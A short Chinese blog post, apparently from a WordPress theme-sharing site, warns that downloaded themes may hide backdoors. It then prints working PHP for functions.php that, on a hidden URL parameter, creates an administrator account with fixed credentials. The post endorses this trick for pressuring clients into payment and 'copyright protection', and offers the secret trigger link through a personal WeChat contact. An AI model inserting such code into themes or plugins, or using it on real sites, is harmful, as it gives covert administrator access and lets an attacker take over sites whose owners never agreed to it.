最近很多朋友问我百度搜索的模板能不能用?能用,但是有风险!因为为模板添加一个后门很简单,这里所谓的后门就是通过在模板函数文件中添加一段代码,然后通过一段隐秘的链接尽快就可以设置管理员账号进入网站后台。
以下既是一段简单的后门代码:
- add_action(‘wp_head’, ‘holeinthewall’);
- function holeinthewall() {
- If ($_GET[‘backdoor’] == ‘go’) {
- require(‘wp-includes/registration.php’);
- If (!username_exists(‘username’)) {
- $user_id = wp_create_user(‘username’, ‘password’);
- $user = new WP_User($user_id);
- $user->set_role(‘administrator’);
- }
- }
- }
模板制作者只要把这段代码放置到模板函数文件functions.php文件中,然后通过一个隐秘的链接就可以创建一个用户名为“username”,密码为:“password” 的管理员账号,从而进入网站后台为所欲为。
说明:因为这种方式仅可以使用到接单追款和版权保护,所以不再分享隐秘链接,如有特殊需要请联系我的个人微信号(xiaochuanblog)索要。
声明:本站分享的WordPress主题/插件均遵循 GPLv2 许可协议(免费开源),相关介绍资料仅供学习参考,实际版本可能会因版本迭代或开发者调整而产生变化,如程序中涉及有第三方原创图像、设计模板、远程服务等内容,应获得作者授权后方可使用。本站不提供该程序/软件的产品授权与技术服务,亦不收取相关费用。
评论(0)